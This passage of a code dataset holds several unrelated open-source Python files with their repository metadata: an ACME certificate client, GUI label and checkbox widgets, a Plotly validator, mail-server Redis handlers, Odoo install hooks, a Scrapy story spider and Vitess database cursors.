resp_data = resp.read().decode('utf8').strip()
assert resp_data == keyauthorization
except (IOError, AssertionError):
os.remove(wellknown_path)
raise ValueError("Wrote file to {0}, but couldn't download {1}".format(
wellknown_path, wellknown_url))
        # notify the CA that the challenge is met
code, result = _send_signed_request(challenge['uri'], {
"resource": "challenge",
"keyAuthorization": keyauthorization,
})
if code != 202:
raise ValueError("Error triggering challenge: {0} {1}".format(code, result))
# wait for challenge to be verified
while True:
try:
resp = urlopen(challenge['uri'])
challenge_status = json.loads(resp.read().decode('utf8'))
except IOError as e:
raise ValueError("Error checking challenge: {0} {1}".format(
e.code, json.loads(e.read().decode('utf8'))))
if challenge_status['status'] == "pending":
time.sleep(2)
elif challenge_status['status'] == "valid":
log.info("{0} verified!".format(domain))
os.remove(wellknown_path)
break
else:
raise ValueError("{0} challenge did not pass: {1}".format(
domain, challenge_status))
# get the new certificate
log.info("Signing certificate...")
proc = subprocess.Popen(["openssl", "req", "-in", csr, "-outform", "DER"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
csr_der, err = proc.communicate()
code, result = _send_signed_request(CA + "/acme/new-cert", {
"resource": "new-cert",
"csr": _b64(csr_der),
})
if code != 201:
raise ValueError("Error signing certificate: {0} {1}".format(code, result))
# return signed certificate!
log.info("Certificate signed!")
return """-----BEGIN CERTIFICATE-----\n{0}\n-----END CERTIFICATE-----\n""".format(
"\n".join(textwrap.wrap(base64.b64encode(result).decode('utf8'), 64)))
def main(argv):
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description=textwrap.dedent("""\
This script automates the process of getting a signed TLS certificate from
Let's Encrypt using the ACME protocol. It will need to be run on your server
and have access to your private account key, so PLEASE READ THROUGH IT! It's
only ~200 lines, so it won't take long.
===Example Usage===
python acme_tiny.py --account-key ./account.key --csr ./domain.csr --acme-dir /usr/share/nginx/html/.well-known/acme-challenge/ > signed.crt
===================
===Example Crontab Renewal (once per month)===
0 0 1 * * python /path/to/acme_tiny.py --account-key /path/to/account.key --csr /path/to/domain.csr --acme-dir /usr/share/nginx/html/.well-known/acme-challenge/ > /path/to/signed.crt 2>> /var/log/acme_tiny.log
==============================================
""")
)
parser.add_argument("--account-key", required=True, help="path to your Let's Encrypt account private key")
parser.add_argument("--csr", required=True, help="path to your certificate signing request")
parser.add_argument("--acme-dir", required=True, help="path to the .well-known/acme-challenge/ directory")
parser.add_argument("--quiet", action="store_const", const=logging.ERROR, help="suppress output except for errors")
parser.add_argument("--ca", default=DEFAULT_CA, help="certificate authority, default is Let's Encrypt")
args = parser.parse_args(argv)
LOGGER.setLevel(args.quiet or LOGGER.level)
signed_crt = get_crt(args.account_key, args.csr, args.acme_dir, log=LOGGER, CA=args.ca)
sys.stdout.write(signed_crt)
if __name__ == "__main__": # pragma: no cover
main(sys.argv[1:])
|
FuzzyHobbit/acme-tiny
|
acme_tiny.py
|
Python
|
mit
| 9,077 | 0.004407 |
#-------------------------------------------------------------------------------
#
# Define standard Enable 'control' components, like text/image labels,
# push buttons, radio buttons, check boxes, and so on.
#
# Written by: David C. Morrill
#
# Date: 10/10/2003
#
# (c) Copyright 2003 by Enthought, Inc.
#
# Classes defined: Label
# RadioButton
# CheckBox
#
#-------------------------------------------------------------------------------
from __future__ import with_statement
# Major library imports
import os.path
# Enthought library imports
from enable.colors import ColorTrait
from traits.api import Bool, Delegate, HasTraits, Str, Trait, \
TraitPrefixList
from traitsui.api import View, Group
# Local relative imports
from component import Component
from base import LEFT, RIGHT, TOP, BOTTOM, HCENTER, VCENTER, EMBOSSED, ENGRAVED, \
transparent_color, xy_in_bounds, add_rectangles
from enable_traits import spacing_trait, padding_trait, margin_trait,\
border_size_trait, image_trait
from enable_traits import position_trait, font_trait, engraving_trait
from radio_group import RadioStyle, RadioGroup
#-------------------------------------------------------------------------------
# Constants:
#-------------------------------------------------------------------------------
empty_text_info = ( 0, 0, 0, 0 )
LEFT_OR_RIGHT = LEFT | RIGHT
TOP_OR_BOTTOM = TOP | BOTTOM
orientation_trait = Trait( 'text', TraitPrefixList( [ 'text', 'component' ] ) )
class LabelTraits ( HasTraits ):
text = Str
font = font_trait
text_position = position_trait("left")
color = ColorTrait("black")
shadow_color = ColorTrait("white")
style = engraving_trait
image = image_trait
image_position = position_trait("left")
image_orientation = orientation_trait
spacing_height = spacing_trait
spacing_width = spacing_trait
padding_left = padding_trait
padding_right = padding_trait
padding_top = padding_trait
padding_bottom = padding_trait
margin_left = margin_trait
margin_right = margin_trait
margin_top = margin_trait
margin_bottom = margin_trait
border_size = border_size_trait
border_color = ColorTrait("black")
bg_color = ColorTrait("clear")
enabled = Bool(True)
selected = Bool(False)
#---------------------------------------------------------------------------
# Trait view definitions:
#---------------------------------------------------------------------------
traits_view = View(
Group( 'enabled', 'selected',
id = 'component' ),
Group( 'text', ' ',
'font', ' ',
'color', ' ',
'shadow_color', ' ',
'style',
id = 'text',
style = 'custom' ),
Group( 'bg_color{Background Color}', '_',
'border_color', '_',
'border_size',
id = 'border',
style = 'custom' ),
Group( 'text_position', '_',
'image_position', '_',
'image_orientation', ' ',
'image',
id = 'position',
style = 'custom' ),
Group( 'spacing_height', 'spacing_width', '_',
'padding_left', 'padding_right',
'padding_top', 'padding_bottom', '_',
'margin_left', 'margin_right',
'margin_top', 'margin_bottom',
id = 'margin' )
)
default_label_traits = LabelTraits()
#-------------------------------------------------------------------------------
# 'Label' class:
#-------------------------------------------------------------------------------
LabelTraitDelegate = Delegate( 'delegate', redraw = True )
LayoutLabelTraitDelegate = LabelTraitDelegate( layout = True )
LabelContentDelegate = LayoutLabelTraitDelegate( content = True )
class Label ( Component ):
#---------------------------------------------------------------------------
# Trait definitions:
#---------------------------------------------------------------------------
delegate = Trait( default_label_traits )
text = LabelContentDelegate
font = LabelContentDelegate
text_position = LayoutLabelTraitDelegate
color = LabelTraitDelegate
shadow_color = LabelTraitDelegate
style = LabelTraitDelegate
image = LayoutLabelTraitDelegate
image_position = LayoutLabelTraitDelegate
image_orientation = LayoutLabelTraitDelegate
spacing_height = LayoutLabelTraitDelegate
spacing_width = LayoutLabelTraitDelegate
padding_left = LayoutLabelTraitDelegate
padding_right = LayoutLabelTraitDelegate
padding_top = LayoutLabelTraitDelegate
padding_bottom = LayoutLabelTraitDelegate
margin_left = LayoutLabelTraitDelegate
margin_right = LayoutLabelTraitDelegate
margin_top = LayoutLabelTraitDelegate
margin_bottom = LayoutLabelTraitDelegate
border_size = LayoutLabelTraitDelegate
border_color = LabelTraitDelegate
bg_color = LabelTraitDelegate
enabled = LabelTraitDelegate
selected = LabelTraitDelegate
#---------------------------------------------------------------------------
# Trait view definitions:
#---------------------------------------------------------------------------
traits_view = View(
Group( '<component>', 'enabled', 'selected',
id = 'component' ),
Group( '<links>', 'delegate',
id = 'links' ),
Group( 'text', ' ',
'font', ' ',
'color', ' ',
'shadow_color', ' ',
'style',
id = 'text',
style = 'custom' ),
Group( 'bg_color{Background Color}', '_',
'border_color', '_',
'border_size',
id = 'border',
style = 'custom' ),
Group( 'text_position', '_',
'image_position', '_',
'image_orientation', ' ',
'image',
id = 'position',
style = 'custom' ),
Group( 'spacing_height', 'spacing_width', '_',
'padding_left', 'padding_right',
'padding_top', 'padding_bottom', '_',
'margin_left', 'margin_right',
'margin_top', 'margin_bottom',
id = 'margin' )
)
colorchip_map = {
'fg_color': 'color',
'bg_color': 'bg_color',
'shadow_color': 'shadow_color',
'alt_color': 'border_color'
}
#---------------------------------------------------------------------------
# Initialize the object:
#---------------------------------------------------------------------------
def __init__ ( self, text = '', **traits ):
self.text = text
Component.__init__( self, **traits )
#---------------------------------------------------------------------------
# Handle any trait being modified:
#---------------------------------------------------------------------------
def _anytrait_changed ( self, name, old, new ):
trait = self.trait( name )
if trait.content:
self.update_text()
if trait.redraw:
if trait.layout:
self.layout()
self.redraw()
#---------------------------------------------------------------------------
# Return the components that contain a specified (x,y) point:
#---------------------------------------------------------------------------
def _components_at ( self, x, y ):
if self._in_margins( x, y ):
return [ self ]
return []
#---------------------------------------------------------------------------
    # Return whether or not a specified point is inside the component margins:
#---------------------------------------------------------------------------
def _in_margins ( self, x, y ):
ml = self.margin_left
mb = self.margin_bottom
return xy_in_bounds( x, y, add_rectangles(
self.bounds,
( ml, mb, -(self.margin_right + ml), -(self.margin_top + mb) ) ) )
#---------------------------------------------------------------------------
# Update any information related to the text content of the control:
#---------------------------------------------------------------------------
def update_text ( self ):
text = self.text
if text == '':
self._text = []
self._tdx = []
self._max_tdx = self._tdy = 0
else:
self._text = _text = text.split( '\n' )
gc = self.gc_temp()
gc.set_font( self.font )
max_tdx = 0
self._tdx = _tdx = [ 0 ] * len( _text )
for i, text in enumerate( _text ):
tdx, tdy, descent, leading = gc.get_full_text_extent( text )
tdy += descent + 5
max_tdx = max( max_tdx, tdx )
_tdx[i] = tdx
self._max_tdx = max_tdx
self._tdy = tdy
#---------------------------------------------------------------------------
# Layout and compute the minimum size of the control:
#---------------------------------------------------------------------------
def layout ( self ):
sdx = self.spacing_width
sdy = self.spacing_height
n = len( self._text )
if n == 0:
tdx = tdy = sdx = sdy = 0
else:
tdx = self._max_tdx
tdy = self._tdy * n
image = self._image
if image is not None:
idx = image.width()
idy = image.height()
else:
idx = idy = sdx = sdy = 0
image_position = self.image_position_
if image_position & LEFT_OR_RIGHT:
itdx = tdx + sdx + idx
if image_position & LEFT:
ix = 0
tx = idx + sdx
else:
tx = 0
ix = tdx + sdx
else:
itdx = max( tdx, idx )
ix = (itdx - idx) / 2.0
tx = (itdx - tdx) / 2.0
if image_position & TOP_OR_BOTTOM:
itdy = tdy + sdy + idy
if image_position & TOP:
iy = tdy + sdy
ty = 0
else:
iy = 0
ty = idy + sdy
else:
itdy = max( tdy, idy )
iy = (itdy - idy) / 2.0
ty = (itdy - tdy) / 2.0
bs = 2 * self.border_size
self.min_width = itdx + (self.margin_left + self.margin_right +
self.padding_left + self.padding_right + bs)
self.min_height = itdy + (self.margin_top + self.margin_bottom +
self.padding_top + self.padding_bottom + bs)
self._info = ( ix, iy, idx, idy, tx, ty, tdx, self._tdy, itdx, itdy )
#---------------------------------------------------------------------------
# Draw the contents of the control:
#---------------------------------------------------------------------------
def _draw ( self, gc, view_bounds, mode):
# Set up all the control variables for quick access:
ml = self.margin_left
mr = self.margin_right
mt = self.margin_top
mb = self.margin_bottom
pl = self.padding_left
pr = self.padding_right
pt = self.padding_top
pb = self.padding_bottom
bs = self.border_size
bsd = bs + bs
bsh = bs / 2.0
x, y, dx, dy = self.bounds
ix, iy, idx, idy, tx, ty, tdx, tdy, itdx, itdy = self._info
        # Fill the background region (if required):
bg_color = self.bg_color_
if bg_color is not transparent_color:
with gc:
gc.set_fill_color( bg_color )
gc.begin_path()
gc.rect( x + ml + bs, y + mb + bs,
dx - ml - mr - bsd, dy - mb - mt - bsd )
gc.fill_path()
# Draw the border (if required):
if bs > 0:
border_color = self.border_color_
if border_color is not transparent_color:
with gc:
gc.set_stroke_color( border_color )
gc.set_line_width( bs )
gc.begin_path()
gc.rect( x + ml + bsh, y + mb + bsh,
dx - ml - mr - bs, dy - mb - mt - bs )
gc.stroke_path()
# Calculate the origin of the image/text box:
text_position = self.text_position_
if self.image_orientation == 'text':
# Handle the 'image relative to text' case:
if text_position & RIGHT:
itx = x + dx - mr - bs - pr - itdx
else:
itx = x + ml + bs + pl
if text_position & HCENTER:
itx += (dx - ml - mr - bsd - pl - pr - itdx) / 2.0
if text_position & TOP:
ity = y + dy - mt - bs - pt - itdy
else:
ity = y + mb + bs + pb
if text_position & VCENTER:
ity += (dy - mb - mt - bsd - pb - pt - itdy) / 2.0
else:
# Handle the 'image relative to component' case:
itx = ity = 0.0
if text_position & RIGHT:
tx = x + dx - mr - bs - pr - tdx
else:
tx = x + ml + bs + pl
if text_position & HCENTER:
tx += (dx - ml - mr - bsd - pl - pr - tdx) / 2.0
if text_position & TOP:
ty = y + dy - mt - bs - pt - tdy
else:
ty = y + mb + bs + pb
if text_position & VCENTER:
ty += (dy - mb - mt - bsd - pb - pt - tdy) / 2.0
image_position = self.image_position_
if image_position & RIGHT:
ix = x + dx - mr - bs - pr - idx
else:
ix = x + ml + bs + pl
if image_position & HCENTER:
ix += (dx - ml - mr - bsd - pl - pr - idx) / 2.0
if image_position & TOP:
iy = y + dy - mt - bs - pt - idy
else:
iy = y + mb + bs + pb
if image_position & VCENTER:
iy += (dy - mb - mt - bsd - pb - pt - idy) / 2.0
with gc:
# Draw the image (if required):
image = self._image
if image is not None:
gc.draw_image( image, ( itx + ix, ity + iy, idx, idy ) )
# Draw the text (if required):
gc.set_font( self.font )
_text = self._text
_tdx = self._tdx
tx += itx
ty += ity + tdy * len( _text )
style = self.style_
shadow_color = self.shadow_color_
text_color = self.color_
for i, text in enumerate( _text ):
ty -= tdy
_tx = tx
if text_position & RIGHT:
_tx += tdx - _tdx[i]
elif text_position & HCENTER:
_tx += (tdx - _tdx[i]) / 2.0
# Draw the 'shadow' text, if requested:
if (style != 0) and (shadow_color is not transparent_color):
if style == EMBOSSED:
gc.set_fill_color( shadow_color )
gc.set_text_position( _tx - 1.0, ty + 1.0 )
elif style == ENGRAVED:
gc.set_fill_color( shadow_color )
gc.set_text_position( _tx + 1.0, ty - 1.0 )
else:
gc.set_fill_color( shadow_color )
gc.set_text_position( _tx + 2.0, ty - 2.0 )
gc.show_text( text )
# Draw the normal text:
gc.set_fill_color( text_color )
gc.set_text_position( _tx, ty )
gc.show_text( text )
#-- Pickling Protocol ----------------------------------------------------------
    def __getstate__ ( self ):
        state = self.__dict__.copy()
        try:
            del state[ '_image' ]
        except KeyError:
            pass
        return state
def __setstate__ ( self, state ):
self.__dict__.update( state )
self.image = self.image
#-------------------------------------------------------------------------------
# 'CheckBox' class:
#-------------------------------------------------------------------------------
class CheckBox ( Label ):
#---------------------------------------------------------------------------
# Trait definitions:
#---------------------------------------------------------------------------
image_base = Str( '=checkbox' )
#---------------------------------------------------------------------------
# Trait editor definition:
#---------------------------------------------------------------------------
position = Group( '<position>', 'image_base' )
#---------------------------------------------------------------------------
# Initialize the object:
#---------------------------------------------------------------------------
def __init__ ( self, text = '', **traits ):
Label.__init__( self, text, **traits )
self._select_image()
#---------------------------------------------------------------------------
# Select the correct image to display:
#---------------------------------------------------------------------------
def _select_image ( self, *suffixes ):
if len( suffixes ) == 0:
suffixes = [ self._suffix() ]
base, ext = os.path.splitext( self.image_base )
for suffix in suffixes:
image = '%s%s%s' % ( base, suffix, ext )
if self.image_for( image ) is not None:
self.image = image
break
#---------------------------------------------------------------------------
# Select the image suffix based on the current selection state:
#---------------------------------------------------------------------------
def _suffix ( self ):
return [ '', '_on' ][ self.selected ]
#---------------------------------------------------------------------------
# Set the selection state of the component:
#---------------------------------------------------------------------------
def _select ( self ):
self.selected = not self.selected
#---------------------------------------------------------------------------
# Handle the 'selected' status of the checkbox being changed:
#---------------------------------------------------------------------------
def _selected_changed ( self ):
base = self._suffix()
self._select_image( base + [ '', '_over'][ self._over == True ], base )
#---------------------------------------------------------------------------
# Handle mouse events:
#---------------------------------------------------------------------------
def _left_down_changed ( self, event ):
event.handled = True
if self._in_margins( event.x, event.y ):
event.window.mouse_owner = self
base = self._suffix()
self._select_image( base + '_down', base )
self._down = True
def _left_dclick_changed ( self, event ):
self._left_down_changed( event )
def _left_up_changed ( self, event ):
event.handled = True
event.window.mouse_owner = self._down = None
if self._in_margins( event.x, event.y ):
self._select()
def _mouse_move_changed ( self, event ):
event.handled = True
self._over = self._in_margins( event.x, event.y )
if self._over:
event.window.mouse_owner = self
base = self._suffix()
self._select_image(
base + [ '_over', '_down' ][ self._down is not None ], base )
else:
if self._down is None:
event.window.mouse_owner = None
self._select_image()
#-------------------------------------------------------------------------------
# 'RadioButton' class:
#-------------------------------------------------------------------------------
class Radio ( CheckBox, RadioStyle ):
#---------------------------------------------------------------------------
# Trait definitions:
#---------------------------------------------------------------------------
image_base = Str( '=radio' )
#---------------------------------------------------------------------------
# Set the selection state of the component:
#---------------------------------------------------------------------------
def _select ( self ):
self.selected = True
#---------------------------------------------------------------------------
# Handle the container the component belongs to being changed:
#---------------------------------------------------------------------------
def _container_changed ( self, old, new ):
CheckBox._container_changed( self )
if self.radio_group is old.radio_group:
self.radio_group = None
if self.radio_group is None:
if new.radio_group is None:
new.radio_group = RadioGroup()
new.radio_group.add( self )
#---------------------------------------------------------------------------
# Handle the 'selected' status of the checkbox being changed:
#---------------------------------------------------------------------------
def _selected_changed ( self ):
CheckBox._selected_changed( self )
if self.selected:
self.radio_group.selection = self
| tommy-u/enable | enable/controls.py | Python | bsd-3-clause | 22,474 | 0.02207 |
import _plotly_utils.basevalidators
class BordercolorValidator(_plotly_utils.basevalidators.ColorValidator):
def __init__(
self, plotly_name="bordercolor", parent_name="sankey.hoverlabel", **kwargs
):
super(BordercolorValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
array_ok=kwargs.pop("array_ok", True),
edit_type=kwargs.pop("edit_type", "calc"),
**kwargs
)
| plotly/plotly.py | packages/python/plotly/plotly/validators/sankey/hoverlabel/_bordercolor.py | Python | mit | 482 | 0.002075 |
"""App related signal handlers."""
import redis
from django.conf import settings
from django.db.models import signals
from django.dispatch import receiver
from modoboa.admin import models as admin_models
from . import constants
def set_message_limit(instance, key):
"""Store message limit in Redis."""
old_message_limit = instance._loaded_values.get("message_limit")
if old_message_limit == instance.message_limit:
return
rclient = redis.Redis(
host=settings.REDIS_HOST,
port=settings.REDIS_PORT,
db=settings.REDIS_QUOTA_DB
)
if instance.message_limit is None:
# delete existing key
if rclient.hexists(constants.REDIS_HASHNAME, key):
rclient.hdel(constants.REDIS_HASHNAME, key)
return
if old_message_limit is not None:
diff = instance.message_limit - old_message_limit
else:
diff = instance.message_limit
rclient.hincrby(constants.REDIS_HASHNAME, key, diff)
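# Illustrative arithmetic for the diff logic above (hypothetical numbers, not
# part of the original module): raising a domain's message_limit from 100 to
# 150 sends hincrby(..., key, 50); lowering it afterwards from 150 to 80 would
# send hincrby(..., key, -70); setting it to None deletes the hash field instead.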
@receiver(signals.post_save, sender=admin_models.Domain)
def set_domain_message_limit(sender, instance, created, **kwargs):
"""Store domain message limit in Redis."""
set_message_limit(instance, instance.name)
@receiver(signals.post_save, sender=admin_models.Mailbox)
def set_mailbox_message_limit(sender, instance, created, **kwargs):
"""Store mailbox message limit in Redis."""
set_message_limit(instance, instance.full_address)
| modoboa/modoboa | modoboa/policyd/handlers.py | Python | isc | 1,435 | 0 |
# Copyright 2019 Tecnativa - David
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
import logging
from odoo import SUPERUSER_ID, api
_logger = logging.getLogger(__name__)
def pre_init_hook(cr):
"""Speed up the installation of the module on an existing Odoo instance"""
cr.execute(
"""
SELECT column_name
FROM information_schema.columns
WHERE table_name='stock_move' AND
column_name='qty_returnable'
"""
)
if not cr.fetchone():
_logger.info("Creating field qty_returnable on stock_move")
cr.execute(
"""
ALTER TABLE stock_move ADD COLUMN qty_returnable float;
"""
)
cr.execute(
"""
UPDATE stock_move SET qty_returnable = 0
WHERE state IN ('draft', 'cancel')
"""
)
cr.execute(
"""
UPDATE stock_move SET qty_returnable = product_uom_qty
WHERE state = 'done'
"""
)
def post_init_hook(cr, registry):
"""Set moves returnable qty on hand"""
with api.Environment.manage():
env = api.Environment(cr, SUPERUSER_ID, {})
moves_draft = env["stock.move"].search([("state", "in", ["draft", "cancel"])])
moves_no_return_pendant = env["stock.move"].search(
[
("returned_move_ids", "=", False),
("state", "not in", ["draft", "cancel", "done"]),
]
)
moves_by_reserved_availability = {}
for move in moves_no_return_pendant:
moves_by_reserved_availability.setdefault(move.reserved_availability, [])
moves_by_reserved_availability[move.reserved_availability].append(move.id)
for qty, ids in moves_by_reserved_availability.items():
cr.execute(
"UPDATE stock_move SET qty_returnable = %s " "WHERE id IN %s",
(qty, tuple(ids)),
)
moves_no_return_done = env["stock.move"].search(
[
("returned_move_ids", "=", False),
("state", "=", "done"),
]
)
# Recursively solve quantities
updated_moves = moves_no_return_done + moves_draft + moves_no_return_pendant
remaining_moves = env["stock.move"].search(
[
("returned_move_ids", "!=", False),
("state", "=", "done"),
]
)
while remaining_moves:
_logger.info("{} moves left...".format(len(remaining_moves)))
remaining_moves, updated_moves = update_qty_returnable(
cr, remaining_moves, updated_moves
)
def update_qty_returnable(cr, remaining_moves, updated_moves):
for move in remaining_moves:
if all([x in updated_moves for x in move.returned_move_ids]):
quantity_returned = sum(move.returned_move_ids.mapped("qty_returnable"))
quantity = move.product_uom_qty - quantity_returned
cr.execute(
"UPDATE stock_move SET qty_returnable = %s " "WHERE id = %s",
(quantity, move.id),
)
remaining_moves -= move
updated_moves += move
return remaining_moves, updated_moves
| OCA/stock-logistics-workflow | stock_return_request/hooks.py | Python | agpl-3.0 | 3,276 | 0.001526 |
# -*- coding:utf8 -*-
from scrapy import Request
from scrapy.spiders import CrawlSpider, Rule
from scrapy.linkextractors import LinkExtractor
from scrapy.loader.processors import Join
from scrapy.loader import ItemLoader
from scrapy.selector import HtmlXPathSelector, Selector
from zadolbali.items import StoryItem
class StoryLoader(ItemLoader):
default_output_processor = Join(' ')
class StoriesSpider(CrawlSpider):
name = 'stories'
allowed_domains = ['zadolba.li']
start_urls = ['http://zadolba.li/']
rules = (
Rule(LinkExtractor(allow=('/[0-9]{8}', )), callback='parse_day', follow=True),
)
def parse_day(self, response):
for url in response.xpath('//div[@class="story"]/h2/a/@href').extract():
request = Request(StoriesSpider.start_urls[0] + str(url)[1:], callback=self.parse_story)
request.meta['date'] = response.url.split('/')[-1]
yield request
def parse_story(self, response):
hxs = HtmlXPathSelector(response)
loader = StoryLoader(StoryItem(), hxs)
loader.add_xpath('id', '//div[@class="story"]/div[@class="id"]/span/text()')
loader.add_xpath('title', '//div[@class="story"]/h1/text()')
loader.add_value('published', str(response.request.meta['date']))
loader.add_xpath('tags', '//div[@class="story"]/div[@class="meta"]/div[@class="tags"]/ul/li/a/@href')
loader.add_xpath('text', 'string(//div[@class="story"]/div[@class="text"])')
loader.add_xpath('likes', 'string(//div[@class="story"]/div[@class="actions"]//div[@class="rating"])')
loader.add_xpath('hrefs', '//div[@class="story"]/div[@class="text"]//a/@href')
loader.add_value('hrefs', '')
loader.add_value('url', str(response.url))
return loader.load_item()
| alexeyqu/zadolbali_corpus | crawler/zadolbali/zadolbali/spiders/stories.py | Python | mit | 1,809 | 0.006081 |
# Copyright 2012, Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can
# be found in the LICENSE file.
"""VTGateCursor, and StreamVTGateCursor."""
import itertools
import operator
import re
from vtdb import base_cursor
from vtdb import dbexceptions
write_sql_pattern = re.compile(r'\s*(insert|update|delete)', re.IGNORECASE)
def ascii_lower(string):
"""Lower-case, but only in the ASCII range."""
return string.encode('utf8').lower().decode('utf8')
class VTGateCursorMixin(object):
def connection_list(self):
return [self._conn]
def is_writable(self):
return self._writable
class VTGateCursor(base_cursor.BaseListCursor, VTGateCursorMixin):
"""A cursor for execute statements to VTGate.
Results are stored as a list.
"""
def __init__(
self, connection, tablet_type, keyspace=None,
shards=None, keyspace_ids=None, keyranges=None,
writable=False, as_transaction=False, single_db=False,
twopc=False):
"""Init VTGateCursor.
Args:
connection: A PEP0249 connection object.
tablet_type: Str tablet_type.
keyspace: Str keyspace or None if batch API will be used.
shards: List of strings.
keyspace_ids: Struct('!Q').packed keyspace IDs.
keyranges: Str keyranges.
writable: True if writable.
as_transaction: True if an executemany call is its own transaction.
single_db: True if single db transaction is needed.
twopc: True if 2-phase commit is needed.
"""
super(VTGateCursor, self).__init__(single_db=single_db, twopc=twopc)
self._conn = connection
self._writable = writable
self.description = None
self.index = None
self.keyspace = keyspace
self.shards = shards
self.keyspace_ids = keyspace_ids
self.keyranges = keyranges
self.lastrowid = None
self.results = None
self.routing = None
self.rowcount = 0
self.tablet_type = tablet_type
self.as_transaction = as_transaction
self._clear_batch_state()
# pass kwargs here in case higher level APIs need to push more data through
# for instance, a key value for shard mapping
def execute(self, sql, bind_variables, **kwargs):
"""Perform a query, return the number of rows affected."""
self._clear_list_state()
self._clear_batch_state()
if self._handle_transaction_sql(sql):
return
entity_keyspace_id_map = kwargs.pop('entity_keyspace_id_map', None)
entity_column_name = kwargs.pop('entity_column_name', None)
write_query = bool(write_sql_pattern.match(sql))
    # NOTE: This check may also be done at higher layers but adding it
    # here for completeness.
if write_query:
if not self.is_writable():
raise dbexceptions.ProgrammingError('DML on a non-writable cursor', sql)
if entity_keyspace_id_map:
raise dbexceptions.ProgrammingError(
'entity_keyspace_id_map is not allowed for write queries')
# FIXME(alainjobart): the entity_keyspace_id_map should be in the
# cursor, same as keyspace_ids, shards, keyranges, to avoid this hack.
if entity_keyspace_id_map:
shards = None
keyspace_ids = None
keyranges = None
else:
shards = self.shards
keyspace_ids = self.keyspace_ids
keyranges = self.keyranges
self.results, self.rowcount, self.lastrowid, self.description = (
self.connection._execute( # pylint: disable=protected-access
sql,
bind_variables,
tablet_type=self.tablet_type,
keyspace_name=self.keyspace,
shards=shards,
keyspace_ids=keyspace_ids,
keyranges=keyranges,
entity_keyspace_id_map=entity_keyspace_id_map,
entity_column_name=entity_column_name,
not_in_transaction=not self.is_writable(),
effective_caller_id=self.effective_caller_id,
**kwargs))
return self.rowcount
def fetch_aggregate_function(self, func):
return func(row[0] for row in self.fetchall())
def fetch_aggregate(self, order_by_columns, limit):
"""Fetch from many shards, sort, then remove sort columns.
    A scatter query may return up to limit rows. Sort all results
    manually, and return the first limit rows.
This is a special-use function.
Args:
order_by_columns: The ORDER BY clause. Each element is either a
column, [column, 'ASC'], or [column, 'DESC'].
limit: Int limit.
Returns:
Smallest rows, with up to limit items. First len(order_by_columns)
columns are stripped.
"""
sort_columns = []
desc_columns = []
for order_clause in order_by_columns:
if isinstance(order_clause, (tuple, list)):
sort_columns.append(order_clause[0])
if ascii_lower(order_clause[1]) == 'desc':
desc_columns.append(order_clause[0])
else:
sort_columns.append(order_clause)
# sort the rows and then trim off the prepended sort columns
if sort_columns:
sorted_rows = list(sort_row_list_by_columns(
self.fetchall(), sort_columns, desc_columns))[:limit]
else:
sorted_rows = itertools.islice(self.fetchall(), limit)
neutered_rows = [row[len(order_by_columns):] for row in sorted_rows]
return neutered_rows
def _clear_batch_state(self):
"""Clear state that allows traversal to next query's results."""
self.result_sets = []
self.result_set_index = None
def close(self):
super(VTGateCursor, self).close()
self._clear_batch_state()
def executemany(self, sql, params_list, **kwargs):
"""Execute multiple statements in one batch.
This adds len(params_list) result_sets to self.result_sets. Each
result_set is a (results, rowcount, lastrowid, fields) tuple.
Each call overwrites the old result_sets. After execution, nextset()
is called to move the fetch state to the start of the first
result set.
Args:
sql: The sql text, with %(format)s-style tokens. May be None.
params_list: A list of the keyword params that are normally sent
to execute. Either the sql arg or params['sql'] must be defined.
**kwargs: passed as is to connection._execute_batch.
"""
if sql:
sql_list = [sql] * len(params_list)
else:
sql_list = [params.get('sql') for params in params_list]
bind_variables_list = [params['bind_variables'] for params in params_list]
keyspace_list = [params['keyspace'] for params in params_list]
keyspace_ids_list = [params.get('keyspace_ids') for params in params_list]
shards_list = [params.get('shards') for params in params_list]
self._clear_batch_state()
# Find other _execute_batch calls in test code.
self.result_sets = self.connection._execute_batch( # pylint: disable=protected-access
sql_list, bind_variables_list, keyspace_list, keyspace_ids_list,
shards_list,
self.tablet_type, self.as_transaction, self.effective_caller_id,
**kwargs)
self.nextset()
def nextset(self):
"""Move the fetch state to the start of the next result set.
self.(results, rowcount, lastrowid, description) will be set to
the next result_set, and the fetch-commands will work on this
result set.
Returns:
True if another result set exists, False if not.
"""
if self.result_set_index is None:
self.result_set_index = 0
else:
self.result_set_index += 1
self._clear_list_state()
if self.result_set_index < len(self.result_sets):
self.results, self.rowcount, self.lastrowid, self.description = (
self.result_sets[self.result_set_index])
return True
else:
self._clear_batch_state()
return None
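# Hypothetical batch usage of VTGateCursor.executemany/nextset (call site and
# values assumed, not part of the original module): each params dict supplies
# 'sql', 'bind_variables' and 'keyspace'; after executemany() the first result
# set is active and nextset() advances until it returns None.
#
#   cursor.executemany(None, [
#       {'sql': 'SELECT 1', 'bind_variables': {}, 'keyspace': 'ks1'},
#       {'sql': 'SELECT 2', 'bind_variables': {}, 'keyspace': 'ks2'},
#   ])
#   while True:
#       rows = cursor.fetchall()
#       if not cursor.nextset():
#           break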
class StreamVTGateCursor(base_cursor.BaseStreamCursor, VTGateCursorMixin):
"""A cursor for streaming statements to VTGate.
Results are returned as a generator.
"""
def __init__(
self, connection, tablet_type, keyspace=None,
shards=None, keyspace_ids=None,
keyranges=None, writable=False):
super(StreamVTGateCursor, self).__init__()
self._conn = connection
self._writable = writable
self.keyspace = keyspace
self.shards = shards
self.keyspace_ids = keyspace_ids
self.keyranges = keyranges
self.routing = None
self.tablet_type = tablet_type
def is_writable(self):
return self._writable
# pass kwargs here in case higher level APIs need to push more data through
# for instance, a key value for shard mapping
def execute(self, sql, bind_variables, **kwargs):
"""Start a streaming query."""
if self._writable:
raise dbexceptions.ProgrammingError('Streaming query cannot be writable')
self._clear_stream_state()
self.generator, self.description = self.connection._stream_execute( # pylint: disable=protected-access
sql,
bind_variables,
tablet_type=self.tablet_type,
keyspace_name=self.keyspace,
shards=self.shards,
keyspace_ids=self.keyspace_ids,
keyranges=self.keyranges,
not_in_transaction=not self.is_writable(),
effective_caller_id=self.effective_caller_id,
**kwargs)
return 0
def sort_row_list_by_columns(row_list, sort_columns=(), desc_columns=()):
"""Sort by leading sort columns by stable-sorting in reverse-index order."""
for column_index, column_name in reversed(
[x for x in enumerate(sort_columns)]):
og = operator.itemgetter(column_index)
if not isinstance(row_list, list):
